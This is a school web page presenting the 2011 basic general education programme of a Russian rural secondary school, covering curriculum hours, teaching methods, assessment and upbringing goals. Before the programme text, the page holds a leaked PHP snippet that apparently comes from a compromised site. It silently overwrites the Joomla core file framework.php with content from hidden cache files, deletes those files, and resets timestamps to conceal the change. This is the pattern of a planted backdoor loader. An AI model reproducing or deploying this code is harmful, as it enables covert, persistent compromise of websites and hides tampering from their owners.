$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } ООП ФК ГОС
Версия для слабовидящих
ООП ФК ГОС

 

 

 

Рассмотрено на педагогическом совете

МБОУ «Горковская СОШ »

Протокол № __1__

от   «   31  »  августа     2011 года

 

 

УТВЕРЖДАЮ

Директор школы______________________

 

 

 

 

Основная образовательная программа

основного общего образования

(ФК ГОС 2004)

МБОУ “ГОРКОВСКАЯ СОШ”

 

 

 

 

 

 

 

 

Содержание Образовательной программы

МБОУ «ГОРКОВСКАЯ СОШ» Верхнетоемского района Архангельской области

I. Нормативно-правовое обоснование образовательной программы________________      3

II. Образовательная программа основного общего образования______________________ 4

2.1.Цели и приоритетные направления образования

     основного общего образования  _____________________________________________ 4

2.2. Характеристика подросткового  возраста и задачи образования основного общего

      образования ______________________________________________________________4

2.3. Учебный план основного общего образования ________________________________ 7

2.4. Учебные программы основного общего образования ___________________________ 8

2.5. Учебно-методическое обеспечение основного общего образования _______________9

2.6. Особенности организации учебно-воспитательного процесса

                и режима работы основного общего образования ______________________________ 9

2.7. Характеристика применяемых нетрадиционных форм

               обучения учащихся и новых педагогических технологий основного общего

               образования _____________________________________________________________  10

         2.8. Система оценок, формы, порядок и периодичность

 промежуточной аттестации учащихся основного общего образования  ___________   11

         2.9. Система аналитических и диагностических методик, используемых при определении

             результатов образовательной деятельности, организация образовательного

             мониторинга основного общего образования __________________________________ 12

      2.10. Особенности воспитательной системы учреждения основного общего образования _  14

 

 

 

 

 

 

 

 

 

 

 

 

1.Нормативно-правовое обоснование образовательной программы

 

Образовательная программа  - это нормативный документ, оп­ределяющий приоритетные ценности и цели, особенности содержания, органи­зации учебно-методического обеспечения образовательного процесса.

Образовательная программа МБОУ «Горковская средняя общеобразовательная школа»  строится на основе правовых актов:

 

    • Международная «Конвенция о правах ребенка»,

Конституция РФ,

Федеральные Законы РФ, РТ «Об образовании»,

Типовое положение об общеобразовательных учреждениях,

«Концепция модернизации российского образования на период до 2010г.»,

«Концепция профильного обучения на старшей ступени общего образова­ния»,

Региональный (национально-региональный) компонент государственного образовательного стандарта  начального общего, основного общего и среднего (полного) общего образования,

 

    • Устав МБОУ «Горковская СОШ»

   В законе РФ «Об образовании» сказано: «Образовательная программа определяет содержание образования соответствующих уровней и их ступеней».

«Общеобразовательные программы направлены на решение задач формирования общей культурно-личностной адаптации к жизни в обществе, на создание осно­вы для осознанного выбора и освоения профессии, специальности».

В МБОУ «Горковская СОШ» накоплен опыт ор­ганизации деятельности образовательного учреждения. Образовательная программа строится с учётом принципов:

Это принципы:

- дифференциации и индивидуализации обучения;

- демократизации управления;

- гуманизации  образовательного процессе.

Такой подход позволяет сохранить преемственность в организации обра­зовательного процесса, побуждает к творческой деятельности педагогический коллектив, создаёт условия для внедрения инновационных технологий, способ­ствующих достижению учащимися с различными возможностями фе­деральных и региональных стандартов.

        Школа реализует общеобразовательные программы начального, основного общего образования.

 

                      

 

 

 

 

 

 

 

 

 

                            II. Образовательная программа основного общего образования

 

2.1.Цели и приоритетные направления образования основного общего

образования МБОУ «Горковская СОШ»

 Цели образования основного общего образования:

    Выполнение государственного образовательного стандарта при обучении учащихся на этапах основного  общего образования, создание условий для формирования у подростка способности к осуществлению ответственного выбора собственной  индивидуальной образовательной траектории, создание образовательной среды, способствующей формированию саморазвивающейся и самореализующейся личности на основе внедрения компетентностного подхода в образовательном и воспитательном процессе.

Основные приоритетные  направления  образования основного общего образования

 

      1. Создание условий для охраны и укрепления физического и психического здоровья детей

Обеспечение достижения всеми обучающимися требований  российских и региональных образовательных стандартов по образовательным областям Базисного учебного плана.

Создание условий благоприятных для укрепления физического, нравственно-психического здоровья детей, обучающихся в школе.

Создание условий для формирования  у  учащихся и педагогов  мотивации к саморазвитию и самообразованию.

Укрепление ресурсной базы школы с целью обеспечения  её  эффективного развития.

Внедрение ИКТ в учебно-воспитательный процесс;

Обеспечение высокого уровня социальной компетентности и образованности выпускников, как результата традиционно высокого качества образования;

Обобщение и распространение педагогического опыта учителей

Укрепление материально-технической базы;

 

 

2.2. Характеристика подросткового возраста и задачи образования

основного общего образования МБОУ «Горковская СОШ»

Характеристика подросткового возраста

Подростковый возраст в человеческой культуре не является еще окончательно оформившимся. Имеет место очевидный  «зазор» между младшими школьниками, усердно постигающими основы знаний, и юношами, входящими в избранную профессию, однако особая культурная форма проживания отрочества пока что отсутствует, и  школьная жизнь современных подростков продолжается в большинстве случаев не только в стенах тех же образовательных учреждений, где обучаются младшие школьники, но и в сходных формах. Однако отношения подростка  к миру принципиально иные. Подросток начинает проявлять взрослость, то есть готовность к взрослой жизни, выражающуюся в возросшей самостоятельности и ответственности.

Этому возрасту свойственно субъективное переживание, чувство взрослости: потребность равноправия, уважения и самостоятельности, требование серьезного, доверительного отношения со стороны взрослых. Пренебрежение этими требованиями, неудовлетворение этой потребности обостряет негативные черты кризисного периода. Очень важно, что в круг значимых людей для подростка входят преимущественно его сверстники, самоопределяющиеся и рискующие вместе с ним.

            Уже в начале подросткового возраста общение со сверстниками  определяется как самостоятельная сфера жизни, критически осмысляются нормы этого общения. Подросток выделяет эталон взрослости (взрослых отношений) и смотрит на себя через этот эталон. Появляется интерес к собственной личности; установка на обширные пространственные и временные масштабы, которые становятся важнее текущих, сегодняшних; появляется стремление к неизвестному, рискованному, к приключениям, героизму, испытанию себя; появляется сопротивление, стремление к волевым усилиям, перерастающее иногда в свои негативные варианты.

           Все эти особенности характеризуют активность подростка, направленную на построение образа себя в мире. Подросток пробует активно взаимодействовать, экспериментировать с миром социальных отношений (социальное экспериментирование).  Потребность определиться в мире отношений влечёт подростка к участию в новых видах деятельности.

Замыслы младшего подростка первоначально нечётки, расплывчаты, масштабны и некритичны. Пробуя осуществить их, он сталкивается с несоответствием своих представлений о себе и мире реальному положению дел. В этом конфликте подросток постепенно начинает осознавать границы собственной взрослости, которые задаются степенью самостоятельности и ответственности.

Возникает новое отношение к учению – стремление к самообразованию, тенденция к самостоятельности в учении:   стремление ставить цели и планировать ход учебной работы, потребность в оценке своих достижений. Строя учебную деятельность подростков,   она не адресуется  к деятельности, ведущей за собой развитие.

 Подростковая школа – это деятельностный ансамбль, в котором у учебной деятельности есть своя сольная партия: развитие комплекса способностей и компетентностей, по-житейски называемых «умение и желание учиться».

Овладев формами учебной деятельности в младшем школьном возрасте, подросток стремится получить признание других людей, внутреннюю уверенность в своих умениях, жаждет личностного проявления и признания этого проявления сверстниками и взрослыми. К учебной деятельности подросток предъявляет новые требования: она должна обеспечить условия для его самооценки и самораскрытия, должна быть значимой для уважаемых подростком людей, для общества. В отличие от младшего школьника  для подростков становится принципиальной их личная склонность к изучению того или иного предмета, знание цели изучения предмета, возможность применения результатов обучения в решении практических задач. Подростков не удовлетворяет роль пассивных слушателей, им неинтересно записывать готовые решения. Они ждут новых форм обучения, в которых были бы реализованы их активность, деятельный характер мышления, тяга к самостоятельности. Чем старше подросток, тем больше он тяготеет к осознанию своих учебных действий, к их планированию и, в конечном счете, к управлению ими.

Этому способствует становящееся понятийное мышление, основы которого закладываются в младшем школьном возрасте.  В подростковом возрасте, благодаря освоению культурных форм общественного сознания (естественные и общественные науки, духовные практики самовыражения)   мышление в понятиях коренным образом преобразует структуру сознания ребенка, оно начинает определять работу памяти, восприятия, воображения, внимания.

 Продуктивное завершение подросткового возраста происходит с появлением способности осознанно, инициативно и ответственно строить свое действие в мире, основываясь не только на видении собственного действия безотносительно к возможности его реализации, но с учетом «отношения мира» к своему действию. Поведение человека становится поведением для себя, человек осознает себя как некое единство.

На второй ступени обучения, представляющей собой продолжение формирования познавательных интересов учащихся и их самообразовательных навыков, педагогический коллектив основной школы стремится: заложить фундамент общей образовательной подготовки школьников, необходимой для продолжения образования на третьей ступени и выбора ими своего направления профессиональной подготовки с учётом собственных способностей и возможностей; создать условия для самовыражения учащихся в различных видах познавательной деятельности на учебных и внеучебных занятиях в школе и вне её.

Наиболее полно способствует формированию прочных знаний, становлению личности индивидуальная и дифференцированная работа, т.к. она ведётся с учётом психологических и возрастных особенностей обучающихся. Дифференциация и индивидуализация имеют своей целью определение содержания образовательного процесса, исходя из особенностей развивающейся личности, её потребностей и возможностей, развивают, прежде всего, интеллектуальный уровень, а также те качества личности, которые связаны с успешностью обучения.

Виды деятельности подростка, связанные с образовательными учреждениями:

 

    • Совместно-распределенная учебная деятельность в личностно-ориентированных формах (включающих возможность самостоятельного планирования и целеполагания, возможность проявить свою индивидуальность, выполнять «взрослые» функции – контроля, оценки, дидактической организации материала и пр.).

 

    • Совместно-распределенная проектная деятельность, ориентированная на получение социально-значимого продукта.

 

    • Исследовательская деятельность в ее разных формах, в том числе,  осмысленное экспериментирование с природными объектами, социальное экспериментирование, направленное на выстраивание отношений с окружающими людьми, тактики собственного поведения.

 

    • Деятельность управления системными объектами (техническими объектами, группами людей).

 

    • Творческая деятельность (художественное, техническое и другое творчество), направленная на самореализацию и самоосознание.

 

    • Спортивная деятельность, направленная на построение образа себя, самоизменение.

 

 

Задачи основного общего  образования:

Задачи обучения

1. Выполнить федеральный и региональный государственные  стандарты основного общего образования.

2. Реализовать  образовательную программу основной школы в  разнообразных организационно-учебных  формах (уроки одновозрастные и разновозрастные, занятия, тренинги, проекты, практики, конференции, выездные сессии и пр.), с постепенным расширением  возможностей школьников осуществлять выбор уровня и характера самостоятельной работы

3. Способствовать формированию у учащихся целостной картины мира на основе глубоких и всесторонних знаний основ наук.

4.  Создать комфортную образовательную среду на основе личностно ориентированного обучения, сформировать у учащихся навыки самоконтроля как средства развития личности.

5.   Продолжить работу по предпрофильной подготовке учащихся 9-го класса

6. Усилить работу по подготовке к Государственной (итоговой) аттестации в новой форме.

7. Продолжить работу по выявлению одаренных детей.

8. Расширить практику использования мультимедийных средств обучения как фактора, позволяющего создать здоровьесберегающее пространство урока.

 

Задачи развития

1.    Развивать навыки самоконтроля и самодисциплины.

2. Развивать творческий потенциал учащихся, их активность через проведение общешкольных коллективных творческих дел, формирование и укрепление традиций школы. Усиление общекультурной направленности общего образования в целях повышения адаптивных возможностей школьников.

3.  Развивать устойчивый интерес к учению, и формированию познавательной деятельности. 

 

Задачи воспитания

1.    Способствовать воспитанию нравственной, физически здоровой личности, способной к творчеству и самоопределению.

3.    Воспитывать положительное отношение к труду, к будущей профессии.

4.    Формировать представление и потребность в здоровом образе жизни.

 

 

2.3. БУП РФ и учебный план основного общего образования

МБОУ «Горковская СОШ»

Базисный учебный план образовательных учреждений Российской Федерации
Основное общее образование

Учебные предметы

Количество часов в год

Всего

V

VI

VII

VIII

IX

Русский язык

105

105

105

105

70

490

Литература

70

70

70

70

105

385

Родной язык и литература*

(210)

(210)

(175)

(105)

(105)

(805)

Иностранный язык

105

105

105

105

105

525

Математика

175

175

175

175

175

875

Информатика и ИКТ

   

   

   

35

70

105

История

70

70

70

70

70

350

Обществознание (включая экономику и право)

   

35

35

35

35

140

География

   

35

70

70

70

245

Природоведение

70

   

   

   

   

70

Физика

   

   

70

70

70

210

Химия

   

   

   

70

70

140

Биология

   

35

70

70

70

245

Искусство (Музыка и ИЗО)

70

70

70

35

35

280

Технология

70

70

70

35

   

245

Основы безопасности жизнедеятельности

   

   

   

35

   

35

Физическая культура

105

105

105

105

105

525

Итого:

840

875

1015

1085

1050

4865

Региональный (национально-региональный) компонент и компонент образовательного учреждения (6-дневная неделя)

245

245

175

140

175

980

Предельно допустимая аудиторная учебная нагрузка при 6-дневной учебной неделе (требования СанПиН)

1085

1120

1190

1225

1225

5845

Региональный (национально-региональный) компонент и компонент образовательного учреждения (5-дневная неделя)

140

140

70

35

70

455

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе (требования СанПиН)

980

1015

1085

1120

1120

5320

 

 

 

 

 

 

3.4.Учебные программы основного общего образования

МБОУ «Горковская СОШ»

         Учебная программа - это нормативный документ, в котором очерчивается круг основных знаний, навыков и умений, подлежащих усвоению по каждому отдельно взятому учебному предмету. Она включает перечень тем изучаемого материала, рекомендации по количеству времени на каждую тему, распределение их по годам обучения и время, отводимое для изучения всего курса.

Учебные программы утверждаются МО и Н РФ и носят рекомендательный характер. На их основе составляются рабочие программы, в которых, как правило, отражается национально-региональный компонент, учитываются возможности методического потенциала учительства, а также информационного, технического обеспечения и, естественно, уровень подготовленности учащихся. Учебные программы основного общего образования МБОУ «Горковская СОШ» соответствуют федеральному и региональному перечням учебных программ.

 

3.5. Учебно-методическое обеспечение основного общего образования

МБОУ «Горковская СОШ»

 Учебники основного общего образования соответствуют федеральному и региональному перечням учебников, рекомендованных МО и Н РФ, МО и Н РТ к использованию в образовательном процессе в общеобразовательных учреждениях.

 

3.6. Особенности организации учебно-воспитательного процесса и режима работы основного общего образования МБОУ «Горковская СОШ»

 

В основе организации учебно-воспитательного процесса лежат следующие принципы:

  • принцип преемственности в содержании и в структуре;
  • принцип приоритетности здоровья, соблюдения санитарно-гигиенических норм;
  • принцип активного деятельностного участия ребенка в учебном процессе;
  • принцип дифференцированного подхода к обучению;
  • принцип индивидуального подхода к каждому ребенку на основе анализа его развития;
  • принцип приоритетности творческой, исследовательской деятельности в урочной и внеурочной работе:
  • принцип интегрирования учебных предметов внутри и внеобразовательных об­ластей;
  • принцип взаимосвязи обязательных предметов , элективных курсов;

 На основе данных принципов организуется учебно-воспитательный про­цесс

МБОУ «Горковская СОШ».

 

Расписание учебных занятий в ОУ составляется с учётом санитар­но-гигиенических норм. Рационально составленное расписание - это снижение и ликвидация перегрузок учащихся, повышение работоспособности и высокое ка­чество процесса обучения; оно преследует прежде всего цель оптимизации усло­вий обучения учащихся и работы учителя. Расписание занятий обеспечивает вы­полнение следующих требований:

  • гигиена умственного труда учащихся разных возрастных групп, дневная и

недельная динамика их работоспособности;

  • учет сложности учебных предметов для восприятия обучаемыми при од­новременном учете эффективности их работоспособности в течение каж­дого дня и всей недели;
  • выполнение норм, регулирующих нагрузку учащихся;
  • обеспечение единства урочной, внеурочной и внешкольной деятельности

учащихся;

  • возможность «окон» для рационального использования сил педагогов;
  • координация действий учителей и классных руководителей;
  • учет требований нормативных документов, регулирующих деятельность ОУ.

После второго и третьего урока проводится большая перемена для организации питания учащихся.

Особенностями составления расписания в 6-8 классах являются: вариативность расстановки часов математического, гуманитарного, есте­ственнонаучного, эстетического циклов, часов физической нагрузки.

 

3.7. Характеристика применяемых нетрадиционных форм обучения

 учащихся и новых педагогических технологий основного общего образования

 МБОУ «Горковская СОШ»

Учитель в процессе познания с помощью разнообразных учебных средств выполняет организующую и направляющую функцию. В ОУ нако­плен достаточно большой опыт применения разнообразных педагогических тех­нологий, форм и методов обучения. Это:

  • технология разноуровневого обучения - исходит из того, что уровень обу­чаемости детей зависит, прежде всего, от времени, необходимого для усвое­ния учебного материала;
  • технология проблемно-диалогового обучения - ребенок находится в позиции «первооткрывателя» знаний, обеспечивает познавательные потребности ребенка в соответствии с его возможностями;
  • технология проектного обучения - способствующая организации самостоя­тельной деятельности обучающихся и другие.

Инновационные технологии, безусловно, способствуют приобретению учащимися собственного опыта научной и культурной деятельности, отработке своего метода и меры активности в образовательном процессе.

Наряду с вышеперечисленными технологиями  в ОУ  достаточно широко используются технологии формирующего обучения:

  • объяснительно-иллюстративное обучение;
  • обучение, ориентированное на результат (технология «полного усвоения»);
  • классическое лекционное обучение;
  • классно-урочная система + самостоятельная работа с книгой и т.д.

Технологии формирующего обучения направлены на:

  • накопление и закрепление базовых знаний, умений, навыков;
  • накопление и закрепление новых знаний и умений;
  • формирование нового опыта.

Перспективное направление  в работе педагогического коллектива  – реализация   компетентностного подхода, основанного на личностно-ориентированном  образовании.

          Педагогический коллектив считает, что обучающийся, реализуя свое право на образование, должен иметь возможность выбора не только содержания образования, но и технологии его овладения. И формирующие, и развивающие технологии, и личностно-ориентированные необ­ходимо реализовывать в оптимальном сочетании на основе интеграции. Форма и степень интеграции технологии будет зависеть от общих доминирующих и кон­кретных дидактических целей, особенностей обучающихся, учителя, социально­го и личностного заказа.

Формы организации УВП:

Педагог, стоящий на позициях гуманистической педагогики и психоло­гии, решает ряд психолого-педагогических и культурных задач. Одной из важ­нейших является задача развития самостоятельности учащихся в процессе обра­зования.

Самостоятельная работа - это

  • средство формирования познавательных способностей учащихся, их направ­ленность на непрерывное самообразование;
  • деятельность учащихся, осуществляемая на всех видах учебных занятий.

Развитие навыков самостоятельной работы учителя ОУ видят в ис­пользовании различных форм организации УВП:

  • уроки формирования навыков слушать лекции, вести записи их содержания;
  • уроки формирования навыков и умений разрабатывать дидактические мате­риалы к изучению темы: опорных конспектов, таблиц, графических средств, наглядности;
  • кино и видеоуроки;
  • уроки-презентации;
  • работа в группах;
  • уроки диагностики знаний и умений (в основном контрольно-проверочный характер):
  • тестирование;
  • решение кроссвордов;
  • письменная работа;
  • взаимоопрос;
  • устный ответ.

Достойное место в многообразии форм организации УВП занимает дис­куссия, упорядоченный и целенаправленный процесс обмена идеями, мнениями в группе, ради поиска истины.

Использование данных форм при освоении содержания образования по­зволяет создать психолого-педагогические условия, обеспечивающие активное стимулирование самоценной образовательной деятельности на основе их само­образования, самовыражения в ходе овладения знаниями.

Главной отличительной особенностью обучения в ОУ на основной ступени является использование вузовских форм организации учебного процес­са:

  • лекции,
  • семинары,
  • лабораторные занятия.

Необходимость развития потенциала учащихся, побуждения их к актив­ному познанию окружающей действительности, к осмыслению и нахождению причинно-следственных связей, к развитию логики и коммуникативных способ­ностей, повысила значимость интегрированных уроков, которые решают не множество отдельных задач, а их совокупность.

Все вышеизложенное позволяет сделать следующий вывод: многообразие форм организации УВП расширяет возможности обучающихся в присвоении ими качественных знаний и развитии их творческих способностей.

 

 

3.8.Система оценок, формы, порядок и периодичность

 промежуточной аттестации учащихся основного общего образования

МБОУ «Горковская СОШ»

Промежуточная аттестация - это процесс, устанавливающий соответствие знаний, умений и навыков обучающихся за данный период требованиям учебных программ по предмету, федеральному и региональному компонентам государственного стандарта общего образования.

Промежуточная аттестация подразделяется на текущую, включающую в себя поурочное, тематическое и четвертное оценивание результатов учёбы обучающихся, и годовую.

 Целью промежуточной аттестации является:

а) обеспечение социальной защиты обучающихся, соблюдение их прав и свобод, в частности регламентации учебной загруженности в соответствии с санитарными правилами и нормами, уважения их личности и человеческого достоинства;

б) соотнесение этого уровня с требованиями образовательного Госстандарта;

в) контроль выполнения учебных программ и календарно-тематического графика изучения этих предметов.

Аттестация  может быть плановой, внеплановой и носить обязательный и необязательный характер для учащихся.

 Плановая аттестация является обязательной для обучающихся школы, к ней относится:

  • четвертная промежуточная аттестация проводится во 5 - 9 классах 4 раза в учебном году;
  • годовая аттестация проводится во всех классах 1 раз в учебном году.

Внеплановая аттестация проводится в исключительных случаях, для отдельных обучающихся:  вынужденный отъезд обучающегося и другие уважительные причины; для классов (групп) - незапланированное изменение календарного учебного графика, экспертиза качества образования, решение органов Управления образованием.

Учащиеся, освоившие программу учебного года, переводятся в следую­щий класс.

Перевод учащегося в следующий класс осуществляется по решению педа­гогического совета ОУ.

Обучающиеся 5-9 классов, не освоившие программу учебного года, имеющие академическую задолженность по двум и более предметам, по усмотрению их родителей (законных представителей) - оставляются на повторное обучение, перево­дятся в классы компенсирующего обучения  другого образовательного учреждения или продолжают обучение в форме семейного образования.

Выпускники IX классов, не освоившие программы основного общего образования и имеющие академическую задолженность:

  • по одному предмету принимаются вX
  • по двум и более предметам по усмотрению родителей (законных представителей) принимаются на повторное обучение в IX класс, переводятся или продолжают получать образование в иных формах (семейное, экстернат, дистанционное).

 

3.9.Система аналитических и диагностических методик, используемых при определении результатов образовательной деятельности, организация образовательного мониторинга основного общего образования

МБОУ «Горковская СОШ»

           Школьная система оценки качества образования.

 Деятельность системы оценки качества образования  строится в соответствии с законодательными актами Российской Федерации, региональными  и муниципальными законодательными актами, а также различными нормативами и положениями, регламентирующими реализацию процедур контроля и оценки качества образования.

           Система оценки качества образования представляет собой совокупность организационных и функциональных структур, норм и правил, диагностических и оценочных процедур, обеспечивающих на единой концептуально-методологической основе оценку образовательных достижений обучающихся, эффективности деятельности образовательных учреждений и их систем, качества образовательных программ с учетом запросов основных пользователей результатов системы оценки качества образования.

    Основными пользователями результатов системы оценки качества образования являются:

        Обучающиеся и их родители;

        Совет Школы;

        Общественные организации, заинтересованные в оценке качества образования;

        Отдел образования Верхнетоемского муниципального района ;

        Учредитель Школы.

Основная цель системы оценки качества образования:

      получение, анализ и распространение достоверной информации о состоянии качества образования, тенденциях его развития и причинах, влияющих на его уровень, а также формирование и управление системами сбора, хранения, обработки информации и принятие обоснованных и своевременных управленческих решений.

 

Система мониторинга.

Мониторинг – это процесс непрерывного наблюдения за фактическим положением дел в системе учебно-воспитательного процесса в гимназии, развитием педагогического процесса в целях оптимального выбора образовательных целей, задач и средств их решения.

Предмет мониторинга

Предметом мониторинга является качество образования и воспитания как системообразующий фактор образовательного процесса в гимназии.

Цели мониторинга:

  • Получение оперативной, точной и объективной информации о состоянии результативности учебного процесса в ОУ.
  • Выявление действительных результатов школьного образования и возможности на этой основе корректировать программу развития школы.

Задачи мониторинга

  • непрерывное, длительное наблюдение за состоянием учебного процесса, получение оперативной информации о нем, анализ диагностической информации, а также управление процессом путем своевременного информирования людей о возможном наступлении неблагоприятных, критических ситуаций.
  • выявление и оценивание соответствия фактических результатов деятельности педагогической системы ее конечным целям.

Функции мониторинга

Функциями мониторинга качества образования являются:

  • Получение сравнительных данных, выявление динамики и факторов влияния на динамику качества образования;
  • Определение и упорядочивание информации о состоянии и динамике качества образования;

Показатели и индикаторы качества результатов образовательной деятельности

Комплекс показателей и индикаторов качества результатов образовательной деятельности включает:

  • уровень и качество учебных достижений обучающихся;
  • уровень социализации обучающихся: сформированность компетенций, социального опыта, позволяющих адаптироваться в социуме; личностные достижения;·
  • соответствие показателей качества результатов обучения и воспитания нормативным требованиям и запросам потребителей образовательных услуг.

Комплекс показателей и индикаторов ресурсного обеспечения и условий образовательного процесса включает:·

  • уровень развития материально-технической базы;·
  • обеспеченность участников образовательного процесса учебно-методическими материалами, справочной литературой, современными источниками информации;·

Анализ результатов диагностических исследований осуществляется по традиционной схеме: обработка информации, оформление аналитической  справки, обсуждение результатов на педагогическом совете, совещаниях, методических объединениях, оформление таблиц, диаграмм, пополнение банка имеющихся данных. Одна и та же диагностическая информация исследуется с различных позиций по видам мониторинга, что дает возможность превратить ее в деятельный инструмент управления качеством образования.

 

3.10. Особенности воспитательной системы учреждения основного общего образования МБОУ «Горковская СОШ»

Цель:  Развитие личности ребенка, формирование его интеллектуального, коммуникативного, эстетического и физического потенциала.

 

Задачи воспитательной деятельности:

1. Создать необходимые условия для проявления творческой индивидуальности      каждого ученика.

2.Способствовать формированию основ культуры общения и построения межличностных  отношений.

3.Развивать познавательную активность учащихся.

4.Содействовать формированию гражданской позиции учеников,

самосознания, активной жизненной позиции через самоуправление.

5. Усилить профориентационную работу в 8-9 классах.

6.Совершенствовать систему работы, направленную на сохранение и укрепление здоровья учащихся и привитие им навыков здорового образа жизни.

7.Привлекать родителей к школьным и классным делам, участию в праздниках и повседневной жизни.

 

Субъекты воспитательной системы:

учащиеся, родители, педагогический коллектив.

 

Важнейшие принципы жизнедеятельности:

1. Гуманизация обучения и воспитания.

 2. Гуманизация и дифференциация учебно-воспитательного процесса.

3.Личностно ориентированный подход к воспитанию.

 

Основные направления деятельности:

- создание и объединение детей в творческие коллективы;

- изучение состава учащихся, выявление ученического и родительского актива;

- классные и общешкольные мероприятия;

- изучение мнений, интересов детей, родителей, педагогов.

 

Основные направления развития воспитания:

1.Перестройка учебного процесса, усиление гуманитарной направленности всех учебных дисциплин: включение в традиционные предметы человеческого материала, помогающего детям понять себя, мотивы своего поведения, отношения к окружающим, проектировать свою жизнь.

2. Изменение форм и методов учебной работы: преодоление пассивности детей через дидактические и ролевые игры, разнообразие форм обучения, раскрепощение личности ребенка в учебном процессе, создание условий для получения знаний и умений сверх школьных программ.

3. Ориентация детей на вечные абсолютные ценности: Человек, Семья, Отечество, Труд, Знания, Здоровье, Культура, Мир, Земля. Они охватывают основные аспекты жизнедеятельности и развития личности и образуют основу воспитания.

4. Формирование у учащихся чувства патриотизма, сознания активного гражданина, способного самостоятельно сделать выбор в любой ситуации.

5. Эстетизация  школьной жизни. Создание условий, в которых у всех детей была бы возможность выразить себя в художественной деятельности.

6. Развитие игровых видов деятельности, открывающих большие возможности для самопознания детей.

7. Воспитание детей в духе свободы, демократии, личного достоинства. С этой целью способствовать развитию школьного самоуправления, сообществ по интересам.

8. Формирование и укрепление школьных традиций.

9. Укрепление сотрудничества детей и взрослых.

10.Превращение воспитательной системы школы в непрерывный инновационный процесс: освоение передовых технологий воспитания.

11. Создание условий для повышения квалификации учителя, его профессионального роста.

 

               Нравственный потенциал:

-  Осмысление целей и смысла жизни.

-  Усвоение ценностей: «Отечество»,  «Культура», «Творчество», «Любовь».

 -  Чувство гордости за свою Родину, принадлежность к своей нации.

- Понимание сущности нравственных качеств и черт характера окружающих

людей, толерантность в их воспитании, проявление в отношениях с ними

доброты, честности, порядочности, вежливости.

- Адекватная оценка своих реальных и потенциальных возможностей.

- Готовность к профессиональному самоопределению, самоутверждению и

самореализации во взрослой жизни.

- Активность в общешкольных и классных делах, работа с младшими

школьниками.

 

Познавательный потенциал личности:

- Желание и готовность продолжить обучение после школы или включиться

в трудовую деятельность.

- Потребность в углубленном изучении избранной профессии,

самостоятельном добывании новых знаний.

 

Коммуникативный потенциал:

- Владение умениями и навыками культуры общения.   

- Способность корректировать в общении свою и чужую агрессию.

 - Поддерживать эмоционально устойчивое поведение в кризисной

жизненной ситуации.

 

Художественный потенциал:

- Умение строить свою жизнедеятельность по законам гармонии и красоты.

 - Потребность в посещении театров, концертов, выставок.

- Стремление творить прекрасное в учебной, трудовой, досуговой

деятельности, в отношениях с окружающими.

 

Физический потенциал:

- Стремление к физическому совершенству.

- Умение подготовить и провести подвижные игры и спортивные

соревнования среди сверстников и младших школьников.

- Привычка ежедневно заниматься физическими упражнениями и умение

использовать их в улучшении своей работоспособности и эмоционального

состояния.

 

Направления воспитательной системы:

1.     Внеклассная и внешкольная работа по предметам (предметные викторины, конкурсы, олимпиады, предметные недели, спортивные соревнования, секции).

2.     Развитие ученического самоуправления

3.     Создание и соблюдение школьных традиций.

4.    Совместное проведение досуга детей и родителей ( походы, вечера, конкурсы, поездки).

 

Особенности воспитательного процесса:

Воспитательная работа в школе включает в себя три взаимосвязанных блока, способствующих удовлетворению разнообразных потребностей школьников: воспитательная работа в процессе обучения, внеурочная деятельность, внешкольная деятельность. Деятельность педагогов протекает в пространстве детства, которое мы рассматриваем как совокупность разных "пространств", каждое из которых оказывает воздействие на процесс развития личности ребенка. Создание воспитательной среды в  рамках открытого информационного образовательного пространства школы предполагает:

-  корректировку учебного процесса, усиление гуманитарной направленности всех учебных дисциплин;

- изменение форм и методов учебной работы, преодоление пассивности школьников через дидактические ролевые игры, разнообразие форм обучения, раскрепощение личности ребенка в учебном процессе;

-  ориентацию учащихся на вечные ценности, выраженные в таких категориях как "человек", "красота", "добро", "истина", "культура", "труд", "Отечество", "мир", которые охватывают основные аспекты жизнедеятельности и развития личности, образуют основу воспитания;

-  создание условий для свободного самовыражения и самореализации каждого ребенка в информационном пространстве школы.

Проблемы воспитания:

На состояние воспитанности учащихся и выпускников школ оказывает огромное влияние вся социокультурная ситуация в обществе. Она и поражает первую (внешнюю) группу проблем:

- потеря национальных ценностных ориентиров. В коммунистическом воспитании ценностные ориентиры совпадали с идеологическими идеалами. Разрушение этих идеалов привело и к потере ценностных ориентиров. Попытки педагогов сформировать ценностное отношение к общечеловеческим ценностям государством и значительной частью общества пока не поддерживаются;

- социальное расслоение общества. Резкая популяризация общества по доходам; демонстрация частью населения благосостояния, основанного  не на Трудовой деятельности, порождают у молодежи чувства ущербности, неверия в социальную справедливость; не способствуют формированию законопослушности;

- размывание культурного слоя нации. Эта общая проблема человечества обостряется в нашей стране ситуацией  нестабильности, неопределенности и необходимости для большинства населения направлять основные силы на элементарное выживание. Это ведет к тому, что теряются традиции, культурные истоки нации, молодежь не усваивает ее историю.

Вторую группу составляют проблемы воспитания, порожденные внутренними причинами системы образования. Это:

- недостаточное владение педагогами воспитательными технологиями;

- низкая эффективность воспитывающего потенциала детских общественных организаций.

Чтобы вывести  систему воспитания в школе на качественно новый уровень, необходимо:

1.    Более рациональное использование имеющегося потенциала; повышение профессиональной компетентности воспитателей.

2.    Освоение новых технологий, как в самом воспитательном процессе, так и в управлении им.

3.    Чтобы оказать значимое влияние на результирующую линию развития подрастающего поколения, в масштабах школы, педагогам необходимо обеспечить консолидацию усилий в меняющихся социальных условиях:

-     педагогов, осуществляющих процесс обучения и воспитания подрастающего поколения;

- родительской общественности, которые являются основными пользователями образовательных услуг;

-   представителей всех отраслей социокультурной сферы (медицины, культуры, органов внутренних дел, социальной защиты, науки), формирующих культурное пространство школы.

